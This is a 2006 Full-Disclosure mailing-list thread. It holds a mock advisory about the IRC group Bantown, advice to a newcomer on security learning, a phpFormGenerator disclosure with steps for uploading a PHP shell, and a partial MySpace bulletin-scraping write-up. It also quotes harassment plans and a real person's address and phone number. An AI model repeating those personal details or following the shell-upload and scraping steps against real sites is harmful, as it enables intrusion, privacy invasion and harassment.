On 6/30/06, AMIT SECURITY [EMAIL PROTECTED] wrote: HELLO, MY NAME AMIT. I SECURITY RESEARCH FROM ALL OVER WORLD AND CURRENTLY THIS MY FIRST ADVISORY TO ANYONE RESARCHING. I POST TO MAILING LIST IN INTEREST OF EXPULSION OF KNOWLEDGE. RECENTLY I HEAR OF FREENODE ATTACK AND SOME OPERATORS OWNED FROM SNIFFING OR SOMETHING LIKE THAT. THIS VERY BAD BUT IT HAPPEN IN MY COUNTRY ALL TIME. I SAY TO MYSELF, AMIT, YOU MUST HELP CATCH CRIMINAL WHO DO THIS TO NON-PROFIT ORGANISATION SO I SET OUT TO LEARN ALL THAT I CAN ABOUT THAT CRIMINAL. I FIND OUT TWO GROUP ARE MAY BE TO BLAME, GNNA AND BANTOWNE. GNNA STAND FOR GAY NATIONAL NARCOTICS ALLEGIANCE MY FRIEND FROM WORK SAY, BUT HE NOT KNOW WHAT BANTOWNE STAND FOR. I FIND NO INFO ON GAY NATIONAL NARCOTICS ALLIANCE, AND MY INTUITION TELL ME BANTOWNE TO BLAME. SO THROUGH DEVIOUS MEANS I INFILTRATE BANTOWNE IRC CHANNEL WITH IS LOCATED AT IRC.BANTOWN.ORG (NOTE: IT MINUS THE E) AND THE CHANNEL IS HIDDEN BUT STILL I FIND IT. IT CALLED #BANTOWN (MINUS THE E TOO). THIS IRC CHANNEL IS FULL OF THE BADDEST SCRIPT KIDDIE I HAVE SEEN IN A LONG WHILE, AND I WORK ON SECURITY FOR OVER 20 YEAR, EVEN BEFORE MODERN PC ARE COMMONPLACE AS USER. EVEN SOME PEOPLE IN CHANNEL KNOW PERL OR OTHER USEFUL LANGUAGE. I VERY IMPRESSED. SOME FRIENDLY PEOPLE IN CHANNEL, LOT OF THEM SAY LOL MOST TIME THEY SPEAK. SOME NOT SO FRIENDLY, SAY BAD WORD BUT THAT OK, THEY CRIMINAL SO WHO CARE. I PRESENT FRIENDLY APPEARANCE, THEY TALK FRIENDLY TO ME. THIS NIGHT OF FREENODE HACK NEWS AND THEY PISSED OFF AT LILO, WHO SEEM TO BE SEMI TRUCK DRIVER AND LIVE IN BACK OF TRUCK IN TRUCK TRAILER, CAUSE THEY SAY HE LOTS OF BAD THINGS. SOME OF THEM BE VERY SKILLED PROFESSIONAL AT HACK. ONE GO BY INCOG AND HE MASTER OF CROSSED-SITE-SCRIPTING VULNERABILITY. HE SURF SITES LOOKING FOR VULNERABILITY ALL DAY LONG. I EXCERPT FROM CHANNEL: incog that reminds me... ill go find xss in fark.com incog k, i just found xss in imdb... but my memory is so bad that i dont know if this is new or i just rediscovered it incog just found xss in youtube incog i have xss on flickr incog xss on technocrati incog weev, i have xss on all turdpress blogs ever lncog i just found dailykos xss for rolloffle whatcog I have SA xss whatcog on secure.somethingawful.com THAT OVER FEW DAYS OF TALK. INCOG SEEM TO BE MOST BRUTAL SCRIPT-KIDDIE KNOWN TO MAN, BUT WE CHECK OUT ANOTHER PERSON HE CALLED WEEV. HE BEEN AROUND THE BLOCK A LONG TIME AND HE HAVE MANY IDEA HOW TO CAUSE DAMAGE TO FREENODE AND A MAN NAME LILO. AGAIN I EXCERPT FROM CHANNEL: weev okay guys weev i need you to find some mexican woman in houston weev and just relentlessly troll her weev call her up at all hours of the night weev screaming ROB LEVIN, ROB LEVIN weev and then we're going to say she's the nanny for his kids WEEVE ALSO ENCOURAGE INGOC TO HACKING ACTIVITIES, PROBABLY FOR HIS OWN USAGE LATER ON. I EXCERPT: weev incog: can you get flickr? incog ill try cstone oh god flickr would be hilarious incog flickr uses yahoo id's weev not necessarily weev there are internal flickr ids too weev and it doesnt use the yahoo cookie weev basically you auth with your yahoo id weev and then it gives you a flickr cookie weev and from there its all flickr LIKE SAID, WEEV KNOW A LOT AND PROBABLY RINGLEADER, OR AS THEY SAID IN AMERICA, MASTER OF PUPPETS. AND I DO THINK MANY PEOPLE ON THE CHANNEL PUPPETS. SOME VERY SCRIPT-KIDDIE LIKE. WELL, IT OBVIOUS ALL ARE SCRIPT KIDDIE, BUT SOME ARE VERY. VERY. MOST ALSO IRC KIDDIE. I EXCERPT: tem they unbelievers must be purged tem they unbelievers must be purged tem they unbelievers must be purged tem they unbelievers must be purged tem they unbelievers must be purged tem they unbelievers must be purged bizzy WHY IS SALAD SO GOOD?!!?! bizzy WHY IS SALAD SO GOOD?!!?! bizzy WHY IS SALAD SO GOOD?!!?! AS YOU CAN SEE, SOME VERY DUMB AND NOT UNDERSTAND IRC CLIENT PROPERLY. THERE MANY MORE EXAMPLE OF ABOVE EXCERPT, BUT I LIMIT TO THAT CAUSE IS ANNOYING. BUT WORSE IS YET TO COME, B/C WEEAVE POST PERSONAL INFOMATION OF ROBERT LIVIN, OTHERWISE KNOWN AS LELO ON FREENODE NETWORK, THE TRUCK DRIVER, FOR PLANE VIEW OF ALL TO ABUSE. BANTOWN ALSO RESPONSIBLE FOR POST OF INFORMATION TO CRAIGLIST AND OTHER PLACES. I EXCERPT BUT MUST CENSOR SO THIS INFO IS NOT USED FOR CRIME: weev philsanchez: lilo's federal employer identification number is xx-xxx weev his federal identification number is xx-xxx weev the address officially listed for pdpc is 10100 main street #31 houson tx 77025 weev phone number for pdpc officially listed is 713-589-5863 weev his ssn is xxx xx weev his dob is xx-xx-1955 weev 11-digit texas state taxpayer number xxx weev ROBERT LEVIN weev 9212 BURDINE ST. #1005 weev HOUSTON, TX 77096 weev the last address is his apartment weev no, he doesnt live in a trailer MANY ON #BANTOON SPEAK HIGHLY OF RUIN, WHICH IS SKRIPT-KIDDIE FOR CAUSE HAVOK ON IRC OR NETWORK OR SOME MAIL PROGRAMS. SOME ALSO EAT SALAD OR DISPLAY ANNOYING QUIRK WHERE THEY NOT
Re: [Full-disclosure] Advisory from AMIT concern BANTOWNE
A free advice: Use your capslock key. You do not want to be seen as a newbie or script kid using 1337 speak. Real people over 12 with IQs over 45 don't write in 1337 speak OR use all caps. One of the first hints to detect a phishing mail/website is bad grammar and lack of respect to writing rules, like using, like or like, StRanGe CaPiTaLiZatIONS and other newbie behaviours. On Fri, 30 Jun 2006 12:14:59 -0500 AMIT SECURITY [EMAIL PROTECTED] wrote: AS Thanks for the 0day advisory! It helped out a lot. AS AS YOU ARE VERY WELCOME SIR. AS AS (ps: 10yrs English course, 10yrs security would have been a better AS choice for you if you ask me) AS AS PLEASE DO NOT ATTACK MY ENGLISH. I HAVE TAKED 12 YEARS AS OF ENGLISH CLASSES, AND AS I CLEAR STATE IN MY ADVISORY, AS MY PROFESSIONAL EXPERIENCE IN SECURITY FIELD EXTENSIVE AS OF 20 YEARS. MAYBE YOU WOULD HAVE BETTER CHOICE AS WITH YEARS OF LEARNING TO READ. THANKS YOU. AS AS AMIT AS AS ___ AS Full-Disclosure - We believe in it. AS Charter: http://lists.grok.org.uk/full-disclosure-charter.html AS Hosted and sponsored by Secunia - http://secunia.com/ AS year(now) + 1 será o ano do linux! Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299 vida digital: http://www.contraditorium.com site pessoal e blog: http://www.carloscardoso.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Advisory from AMIT concern BANTOWNE
IS YOUR *caps lock* DAMAGED BEYOND REPAIR?? -d -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of AMIT SECURITY Sent: Friday, June 30, 2006 10:45 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Advisory from AMIT concern BANTOWNE Thanks for the 0day advisory! It helped out a lot. YOU ARE VERY WELCOME SIR. (ps: 10yrs English course, 10yrs security would have been a better choice for you if you ask me) PLEASE DO NOT ATTACK MY ENGLISH. I HAVE TAKED 12 YEARS OF ENGLISH CLASSES, AND AS I CLEAR STATE IN MY ADVISORY, MY PROFESSIONAL EXPERIENCE IN SECURITY FIELD EXTENSIVE OF 20 YEARS. MAYBE YOU WOULD HAVE BETTER CHOICE WITH YEARS OF LEARNING TO READ. THANKS YOU. AMIT ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New member asking question...
On 6/30/06, Reynolds, Joseph R [EMAIL PROTECTED] wrote: Question for everyone on the board? I have been reading the posts over the past few weeks, and am wondering how the heck you guy discover these vulnerabilities. Granted, I am still very new to the IS world, but I cannot begin to understand how you discover weaknesses. After reading these posts, the explanation always makes since, but are you guys actively seeking weaknesses, or just happen to come across them? Also, are there any good Hacking books that I could read? I have had a Hackers Tool and Techniques class at school, but all of the programs are very outdated, like l0phtcrack, JTR, ethereal or wireshark, and such. I am looking to actually enter systems or find ways to enter systems and understand the weakness that allows it so I can avoid it later. Thanks everyone. Joseph K. Reynolds Systems Support Analyst - Intermediate Enterprise Rent-A-Car Email JR Reynolds 314-512-2370 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Two kinds of hackers: 1. Homemade hackers, typically loners with social problems who spend their time infront of computers to feed their social stimulation via the international wide area network. They have so much free time that they've learned how to hack on their own steam. Because of the lack of social background, advanced users in this group, have the time to discover and research ground breaking security and penetration techniques of major vendors, with a real threat to the single mom and retired couple commmity, as well as a threat to corporate and government interests. 2. The guy who went to high school past grades, have friends, socail circles, go out and live a great life. They all of a sudden decide they want to goto university, they goto a computer science course dedicated to ethical hacking, where they learn the in's and out's of hacking corporate infrastructure. They often post to the internet on college computers, showing off skills they've just recently learnt by the lecturer, (Matthew Murphy, *cough*) and get full media coverage by all the major security outlets (*cough* Robert Lemos). This is of course a great mis justice to the real people who dedicate their entire social and educational life to the subject as noted in example 1. Additionally - Theres always going to be a balance between home made hackers (example 1) and manufactured hackers (example 2). Finally - The very fact you've asked the question you've stated leads me to believe you fall into example 2, as someone who falls into example 2 would never post this kind of message to the international WAN security community, respectively. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New member asking question...
On Fri, 30 Jun 2006 11:47:37 CDT, Reynolds, Joseph R said: Also, are there any good Hacking books that I could read? I have had a Hackers Tool and Techniques class at school, but all of the programs are very outdated, like l0phtcrack, JTR, ethereal or wireshark, and I wouldn't call any of these outdated - they're still some of the best tools in their categories. such. I am looking to actually enter systems or find ways to enter systems and understand the weakness that allows it so I can avoid it later. It turns out that you don't actually need to be very good at *finding* weaknesses in order to secure against it. All you need is a good grasp of what general classes of vulnerabilities there are, and what they can gain an attacker. If you need to look at actual code, I'd suggest getting a copy of Metasploit, and just *looking* at it. Look at the payloads section, as that will give you a good idea of the sorts of payloads you might get hit with. Then just assume that the Bad Guy has an exploit for any given outward-facing code and resource on your system... If you want to be scared about how many exploits are already out there, look at Nessus or the Packetstormsecurity archives. ;) In order to secure against this, the proper method is: 0) Simply applying all the current patches for your system, and properly configuring it, will go a *long* way. Two good resources: Center for Internet Security (http://www.cisecurity.org) the NSA security guides (http://www.nsa.gov/snac/downloads_os.cfm?MenuID=scg10.3.1.1) (Basically, these go through all the high-risk issues discussed in 1-4 below, and give you a easy cookbook so you don't have to re-do the research. Disclaimer: I'm one of the perpetrators for the various CIS Unix/Linux guides, so I'm a bit biased.) The two biggest areas those guides don't address in depth are social engineering and abuse of inter-machine trust relationships (if you manage to find a weak password on one box, and then get into a second because there's a file share or SSH key or similar...) 1) Pick a piece of code or resource that an attacker could potentially attack (for instance, your Apache server, or a Windows file share. 2) *ASSUME* that the attacker has a Magic Bullet that can exploit it. You don't need to *find* one, just proceed as if the bad guy did all the hard work and found it. 3) Start looking at ways to mitigate and control the damage. For instance, many buffer overflow Magic Bullets can be stopped with Run Apache with non-exec stack. Many own the file share Bullets can be stopped with either don't export share to world or firewall the Windows fileshare ports. And so on. 4) Lather, rinse, repeat for all the attacks you can think of. pgpADwmgTBIhK.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New member asking question...
On 6/30/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Fri, 30 Jun 2006 11:47:37 CDT, Reynolds, Joseph R said: Also, are there any good Hacking books that I could read? I have had a Hackers Tool and Techniques class at school, but all of the programs are very outdated, like l0phtcrack, JTR, ethereal or wireshark, and I wouldn't call any of these outdated - they're still some of the best tools in their categories. such. I am looking to actually enter systems or find ways to enter systems and understand the weakness that allows it so I can avoid it later. It turns out that you don't actually need to be very good at *finding* weaknesses in order to secure against it. All you need is a good grasp of what general classes of vulnerabilities there are, and what they can gain an attacker. If you need to look at actual code, I'd suggest getting a copy of Metasploit, and just *looking* at it. Look at the payloads section, as that will give you a good idea of the sorts of payloads you might get hit with. Then just assume that the Bad Guy has an exploit for any given outward-facing code and resource on your system... If you want to be scared about how many exploits are already out there, look at Nessus or the Packetstormsecurity archives. ;) In order to secure against this, the proper method is: 0) Simply applying all the current patches for your system, and properly configuring it, will go a *long* way. Two good resources: Center for Internet Security (http://www.cisecurity.org) the NSA security guides (http://www.nsa.gov/snac/downloads_os.cfm?MenuID=scg10.3.1.1) (Basically, these go through all the high-risk issues discussed in 1-4 below, and give you a easy cookbook so you don't have to re-do the research. Disclaimer: I'm one of the perpetrators for the various CIS Unix/Linux guides, so I'm a bit biased.) The two biggest areas those guides don't address in depth are social engineering and abuse of inter-machine trust relationships (if you manage to find a weak password on one box, and then get into a second because there's a file share or SSH key or similar...) 1) Pick a piece of code or resource that an attacker could potentially attack (for instance, your Apache server, or a Windows file share. 2) *ASSUME* that the attacker has a Magic Bullet that can exploit it. You don't need to *find* one, just proceed as if the bad guy did all the hard work and found it. 3) Start looking at ways to mitigate and control the damage. For instance, many buffer overflow Magic Bullets can be stopped with Run Apache with non-exec stack. Many own the file share Bullets can be stopped with either don't export share to world or firewall the Windows fileshare ports. And so on. 4) Lather, rinse, repeat for all the attacks you can think of. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Valdis falls into example 2 of my discussion: 2. The guy who went to high school past grades, have friends, socail circles, go out and live a great life. They all of a sudden decide they want to goto university, they goto a computer science course dedicated to ethical hacking, where they learn the in's and out's of hacking corporate infrastructure. They often post to the internet on college computers, showing off skills they've just recently learnt by the lecturer, (Matthew Murphy, *cough*) and get full media coverage by all the major security outlets (*cough* Robert Lemos). This is of course a great mis justice to the real people who dedicate their entire social and educational life to the subject as noted in example 1. Additionally - Theres always going to be a balance between home made hackers (example 1) and manufactured hackers (example 2). Finally - The very fact you've asked the question you've stated leads me to believe you fall into example 2, as someone who falls into example 1 would never post this kind of message to the international WAN security community, respectively. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New member asking question...
I have been reading the posts over the past few weeks, and am wondering how the heck you guy discover these vulnerabilities. Granted, I am still very new to the IS world, but I cannot begin to understand how you discover weaknesses. After reading these posts, the explanation always makes since, but are you guys actively seeking weaknesses, or just happen to come across them? Learn how things are *supposed* to work (for example, write your own webserver in C), then intentionally throw broken requests at it. Eventually you'll find a result you *didn't* expect, and that's what you should investigate. Knowing *what* is broken is never as important as *why*. As mentioned by another, learning to dream in C, and understanding asm go a *long* way. Oh .. and one more note .. practice on your own stuff. It's easy to get arrested in the process of learning if you're not careful. When you get good at it, play nice and adhere to the rules of responsible disclosure (search the archives for lengthy threads on this seperate issue) /mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Advisory from AMIT concern BANTOWNE
i am sorry, did not realize cap key is turned on. will type off now. thanks you to n3td3v for farther information of bantowne. amit On 6/30/06, Debasis Mohanty [EMAIL PROTECTED] wrote: IS YOUR *caps lock* DAMAGED BEYOND REPAIR?? -d -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of AMIT SECURITY Sent: Friday, June 30, 2006 10:45 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Advisory from AMIT concern BANTOWNE Thanks for the 0day advisory! It helped out a lot. YOU ARE VERY WELCOME SIR. (ps: 10yrs English course, 10yrs security would have been a better choice for you if you ask me) PLEASE DO NOT ATTACK MY ENGLISH. I HAVE TAKED 12 YEARS OF ENGLISH CLASSES, AND AS I CLEAR STATE IN MY ADVISORY, MY PROFESSIONAL EXPERIENCE IN SECURITY FIELD EXTENSIVE OF 20 YEARS. MAYBE YOU WOULD HAVE BETTER CHOICE WITH YEARS OF LEARNING TO READ. THANKS YOU. AMIT ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Weird... www.eon8.com
Does anyone know about this site, or the projects related to it? www.eon8.com ? -- Jay Buhrt Achievement Focused Technology, Inc. [EMAIL PROTECTED] 574-538-8944 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] phpFormGenerator
- EXPL-A-2006-004 exploitlabs.com Advisory 049 - - phpFormGenerator - AFFECTED PRODUCTS = phpFormGenerator v2.09 http://phpformgen.sourceforge.net/ OVERVIEW phpFormGenerator is an easy-to-use tool to create reliable and efficient web forms in a snap. No programming of any sort is required. Just follow along the phpFormGenerator wizard and at the end, you will have a fully functional web form! note: as stated by the vendor this script is widely used with cPanel and other hosting provider solutions. DETAILS === phpFormGenerator by default installs all directories as chmod 777 and will not function if they are not set as such. in the readme: 3. Set read+write+execute file permissions on the 'forms' directory and *everything* inside it (including all subdirectories and files) UNIX: chmod -R 777 forms in process2.php: please make sure that the forms directory (and everything in it) has read+write access. you can achieve this by issuing the following command on linux/unix: chmod -R 777 forms researcher note: when the applications directories are not set 777 the app errors with: File and Directory permissions The forms directory is not writeable. The forms/admin directory is not writeable. The use directory is not writeable. Please give read+write permissions to all the files and directories mentioned above. Refresh this page after you have done so. SOLUTION vendor contact: Musawir Ali [EMAIL PROTECTED] June 30, 2006 patch: none ( see vendor response ) VENDOR RESPONSE === there are no security flaws ... if you had taken a moment to think, you would realize that a a major software company such as cPanel would not be shipping phpFormGenerator with their scripts if it had flaws. In any case, the program has been thoroughly tested by myself and other security experts and is not known to have any issues. 777 is never forced, the suggested method is to give write permissions to the group the process belongs to. upload function is insecure. arbitrary php functions are insecure... could you be any more vague? You seem to be one of those ignorant nuts who shout slogans like windows sucks linux owns your server is insecure without realizing the garbage spooling out of your mouth. you're wasting my time. btw.. just so that you know, i have been on openbsd's development team, written the opengl kit for the openbeos OS project (now Haiku), and am an official GNU maintainer: http://www.gnu.org/people/people.html (search for my name) ... what you should be doing is thinking about how contributing to the opensource community and not being a bitch. PROOF OF CONCEPT 1.browse to the default install directory 2.create new form with the file upload function 3.complete the form using Insert data to MySQL database table? = no 4.as directed browse to http://[host]/[appdir]/[newform_name]/form1.html; 5.upload phpshell type of script 6.if you supplied an email address, the link will be sent to you http://[host]/[appdir]/[newform_name]/files/thescript_name_generated.php CREDITS === This vulnerability was discovered and researched by Donnie Werner of exploitlabs Donnie Werner Information Security Specialist [EMAIL PROTECTED] [EMAIL PROTECTED] -- web: http://exploitlabs.com http://exploitlabs.com/files/advisories/EXPL-A-2006-004-phpformgen.txt ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Advisory from AMIT concern BANTOWNE
On Fri, 30 Jun 2006, AMIT SECURITY wrote: i am sorry, did not realize cap key is turned on. will type off now. thanks you to n3td3v for farther information of bantowne. We did not mean that you can not use your shift key for normal capitalization... -- MVH, Vidar God doesn't play dice. -- Albert Einstein ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] phpFormGenerator
btw.. just so that you know, i have been on openbsd's development team, written the opengl kit for the openbeos OS project (now Haiku), and am an official GNU maintainer: http://www.gnu.org/people/people.html (search for my name) ... what you should be doing is thinking about how contributing to the opensource community and not being a bitch. ...just so you KNOW see how popular he is...there cant be any flaws in his software.hes popular ~pingywon MCSE www.pingywon.com www.illmob.org www.freeillwill.com - Original Message - From: Morning Wood [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Friday, June 30, 2006 5:11 PM Subject: [Full-disclosure] phpFormGenerator - EXPL-A-2006-004 exploitlabs.com Advisory 049 - - phpFormGenerator - AFFECTED PRODUCTS = phpFormGenerator v2.09 http://phpformgen.sourceforge.net/ OVERVIEW phpFormGenerator is an easy-to-use tool to create reliable and efficient web forms in a snap. No programming of any sort is required. Just follow along the phpFormGenerator wizard and at the end, you will have a fully functional web form! note: as stated by the vendor this script is widely used with cPanel and other hosting provider solutions. DETAILS === phpFormGenerator by default installs all directories as chmod 777 and will not function if they are not set as such. in the readme: 3. Set read+write+execute file permissions on the 'forms' directory and *everything* inside it (including all subdirectories and files) UNIX: chmod -R 777 forms in process2.php: please make sure that the forms directory (and everything in it) has read+write access. you can achieve this by issuing the following command on linux/unix: chmod -R 777 forms researcher note: when the applications directories are not set 777 the app errors with: File and Directory permissions The forms directory is not writeable. The forms/admin directory is not writeable. The use directory is not writeable. Please give read+write permissions to all the files and directories mentioned above. Refresh this page after you have done so. SOLUTION vendor contact: Musawir Ali [EMAIL PROTECTED] June 30, 2006 patch: none ( see vendor response ) VENDOR RESPONSE === there are no security flaws ... if you had taken a moment to think, you would realize that a a major software company such as cPanel would not be shipping phpFormGenerator with their scripts if it had flaws. In any case, the program has been thoroughly tested by myself and other security experts and is not known to have any issues. 777 is never forced, the suggested method is to give write permissions to the group the process belongs to. upload function is insecure. arbitrary php functions are insecure... could you be any more vague? You seem to be one of those ignorant nuts who shout slogans like windows sucks linux owns your server is insecure without realizing the garbage spooling out of your mouth. you're wasting my time. btw.. just so that you know, i have been on openbsd's development team, written the opengl kit for the openbeos OS project (now Haiku), and am an official GNU maintainer: http://www.gnu.org/people/people.html (search for my name) ... what you should be doing is thinking about how contributing to the opensource community and not being a bitch. PROOF OF CONCEPT 1.browse to the default install directory 2.create new form with the file upload function 3.complete the form using Insert data to MySQL database table? = no 4.as directed browse to http://[host]/[appdir]/[newform_name]/form1.html; 5.upload phpshell type of script 6.if you supplied an email address, the link will be sent to you http://[host]/[appdir]/[newform_name]/files/thescript_name_generated.php CREDITS === This vulnerability was discovered and researched by Donnie Werner of exploitlabs Donnie Werner Information Security Specialist [EMAIL PROTECTED] [EMAIL PROTECTED] -- web: http://exploitlabs.com http://exploitlabs.com/files/advisories/EXPL-A-2006-004-phpformgen.txt ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New member asking question...
On Fri, 30 Jun 2006 20:20:26 BST, n3td3v said: Valdis falls into example 2 of my discussion: 2. The guy who went to high school past grades, have friends, socail circles, go out and live a great life. Don't presume to be sure over which example I'm more like. Also, you seem to be convinced that there's a binary distinction, and that nobody can be a member of both groups at once. Also, note the context of the original question: systems and understand the weakness that allows it so I can avoid it later. The skillset of a good defender (who is trying to avoid it later) is quite different from the skillset of a good attacker. Now, if he had been asking how to be a good attacker, he'd have gotten a different list of suggestions... pgpGaUCKHabvd.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Data Mining Myspace Bulletins
Myspace Bulletins: The good, the bad, and the ugly Data Mining Myspace, a case study Author: stderr ([EMAIL PROTECTED]) http://stderr.linuxinit.net Original release: http://www.pandora-security.com -- 1. Abstract We all know about myspace.com, and I'll go ahead and admit that I actually have an account to keep up with friends. Myspace is full of a bunch of idiots, but it can be a great tool for keeping up with people... when used properly. Myspace has long been a hacker playground, you may remember the infamous Samy is my hero worm. The worm took advantage of several poor input validation techniques which were being employed. Each person that went to a page with his script in it, automatically sent him a friend request. After this alarming stunt, Myspace fixed a lot of the injection vulnerabilities. -- 2. Introduction to Bulletins On Myspace, you can send bulletins which are sent to all of the friends on your list. That way if you're going on vacation or something, you can let ALL of your friends know what's happening by sending only one message. Most people assume that only their friends can read the bulletins they post... they are sadly mistaken. When you open up a bulletin, you go to a url like the following. http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.readmessageID=1 Yes, you guessed it. If you change the messageID number, you can view any bulletin on Myspace that hasn't yet expired. Now, if we could just collect a ton of bulletins, then we could surely find some juicy information like cell phone numbers, when people are leaving for vacation, where they're going... the list goes on and on. The implementation of bulletins so that everyone can view them may be intentional, but most people assume that bulletins are only readable by friends. Because of this belief, many people post personal details in bulletins, never expecting people like you to read them. The mere existence of the Delete from friends button implies that only friends should be able to read your bulletins. -- 3. Mining the data I was able to whip together a small C program that generates urls, retrieves the bulletin, and saves the html to a file. Once all of the data has been downloaded, it's easy to parse through using a tool like grep. In order for this program to work, you need to download a tool called 'netcat'. You will also need to get your cookie once you're logged into myspace, so that you can view the bulletins. First of all, let's create a new file named request.txt The contents should look something like this, but you'll need to change the cookie to match yours. === Host: bulletin.myspace.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414 Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html ;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cookie: TIMEZONE=3; ODZDBXZG9tY#luPXXhaG#vJSRsZD1DXEWQSASLKJFLAJF;ODIJ;AEIJOIJDFOIAJEDKL124DADK ADS;IFJO;IEAJOIFEA89U;FIO;23A;OIJDSJAOIJOIEJWAIJLDOISJFOIJ39812H12O8JAW098320AJDSLKJ32AOJ12LIJ4 A;OIJ;S;OAIJMCOISJAO8JOIRA2J38U2398JIOAJDFKANKJCNLUIHA8W734HLAIL2L3ANUHDLUIAHF87Y3LAHAKDJHF8L83 5PVVTJmRhdGluZz0wJmRyaW5rZXI9MCZlZHVjYXRpb25pZD0x; NGUserID=a258ca5-2341-1231956342-6; MYSPACE=myspace; AUTOSONGPLAY=0; UNIQUELOGINTAKEOVER_10207218=%7Bts%20%272006-06-2df%047%3A32%x A18%27%7D; MSCOUNTRY=US; FRNDIDxr2g=; rsi_want=0; COUNTRYCODE=MFMGCisGAQQBgjdYA7GgRTBDB gorBgEEAYI3WAMBoDUwMwIDAgABAgJmAwICAMAECHndruAVl3qwBBBgdJZ9K7N%2F34aRlhOz2UArBAi%2BqGfSVTRm7w%3 D%3D; MSCulture=IP=127.0.0.1IPCulture=en-USPreferredCulture=en-USCountry=US; MYUSERINFO=saoijaoi;joiewjaoijdosiajdklajfoijADFJIEAJKDJFIJIEAdlkjlijelaijalidjflijaslijldsijli AIDFJIAEwjfoiajdfeAIJDfAOJeagEOJeAJDalkjdadfAEJaijadlijfdilakmckj85423alkjdklafjdlkajdklajlkjea aDJFAILJJae'oifja;3o4ijmaidjalkfmaijkladfjalkjfioeajlkmdmc,jkjiojoia3wjiojfoiejaoija;odijflkjda ALOAJKEIOAJF3ea:LKfoaidjiajsioajlk3jaijdkfhfkjghncx,jlkjaweoijroiajoijadsljfdlksajfij32lja;dljf aDJFOA:#oKkdjflkaj;ijIOJilj;ioje;ioHiuhNKJhUGJJikhiugygGTYFTJHKHIUgyuhihiugI:HUgugyfTHDGfyjgfff 2FADFaEFeaDfagFhGHggFgadcAweadddafdasfeafgeaeageaijlkfjai;hj;JIOJlihluhkHUIHKhuilgliuHLIUHLHhhh h0DSAFOOJaewoi'jfa;ilj;oi:IOnjiehjioh;iH:IH;iohi;hg;juGYFyjfyjflukhaljdkfaejoijlajdlifjealijddd WIaOJFoa;ejklijdaFOJEaIjo:IJEAOIJEoajf:EOJAjdailjdf;ilaj;lijioj;oije;aojojaoijoiej;oaijo;ij;oij hNaoijao;ijdoifj;ckxx,jaiojeifajkjnaklhugi834829ijljadflkj3alijadlkjfaeljaclijeakjdoijgealijdcd Fsaijo;ij3;oaij;oijod;iasj;oijx90asjoij3alij;ioadjf;iojeo;iaj;oij;dkjfkdjlakjdlska;
Re: [Full-disclosure] Weird... www.eon8.com
